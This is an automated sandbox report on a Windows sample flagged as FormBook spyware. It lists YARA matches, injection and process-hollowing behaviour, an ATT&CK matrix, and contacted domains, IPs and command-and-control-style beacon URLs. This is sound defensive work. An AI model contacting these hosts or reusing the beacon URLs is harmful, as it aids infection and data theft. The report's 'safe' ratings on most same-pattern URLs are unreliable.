          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356555 Sample: 0O9BJfVJi6fEMoS.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 35 www.grandwhale.com 2->35 37 www.smallbathroomdecor.info 2->37 39 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 4 other signatures 2->53 11 0O9BJfVJi6fEMoS.exe 3 2->11         started        signatures3 process4 file5 33 C:\Users\user\...\0O9BJfVJi6fEMoS.exe.log, ASCII 11->33 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 0O9BJfVJi6fEMoS.exe 11->15         started        18 0O9BJfVJi6fEMoS.exe 11->18         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 20 explorer.exe 15->20 injected process9 dnsIp10 41 dgcsales.net 184.106.16.223, 49764, 80 RACKSPACEUS United States 20->41 43 www.besteprobioticakopen.online 94.23.162.163, 49770, 80 OVHFR France 20->43 45 17 other IPs or domains 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 24 explorer.exe 20->24         started        27 autofmt.exe 20->27         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 29 cmd.exe 1 24->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0O9BJfVJi6fEMoS.exe22%ReversingLabsWin32.Spyware.Convagent

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.0O9BJfVJi6fEMoS.exe.32e0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          11.2.explorer.exe.13e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          karthikeyainfraindia.com0%VirustotalBrowse
          td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
          www.besteprobioticakopen.online1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fastenerspelosato.net/uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.horisan-touki.com/uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.buysellleasewithlisa.com/uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.esvstudybible.org/search?q=0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://topicalmemorysystem.googlecode.com/files/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.fertinvitro.doctor/uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.whereinthezooareyou.com/uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.sissysundays.com/uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          www.besteprobioticakopen.online/uszn/100%Avira URL Cloudmalware
          http://www.karthikeyainfraindia.com/uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.besteprobioticakopen.online/uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX100%Avira URL Cloudmalware
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.dgcsales.net/uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.horisan-touki.com
          118.27.99.84
          truetrue
            unknown
            karthikeyainfraindia.com
            202.66.173.116
            truetrueunknown
            td-balancer-euw2-6-109.wixdns.net
            35.246.6.109
            truetrueunknown
            www.besteprobioticakopen.online
            94.23.162.163
            truetrueunknown
            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
            3.223.115.185
            truefalse
              high
              buysellleasewithlisa.com
              160.153.136.3
              truetrue
                unknown
                www.fastenerspelosato.net
                142.91.239.112
                truetrue
                  unknown
                  shops.myshopify.com
                  23.227.38.74
                  truetrue
                    unknown
                    fertinvitro.doctor
                    34.102.136.180
                    truetrue
                      unknown
                      dgcsales.net
                      184.106.16.223
                      truetrue
                        unknown
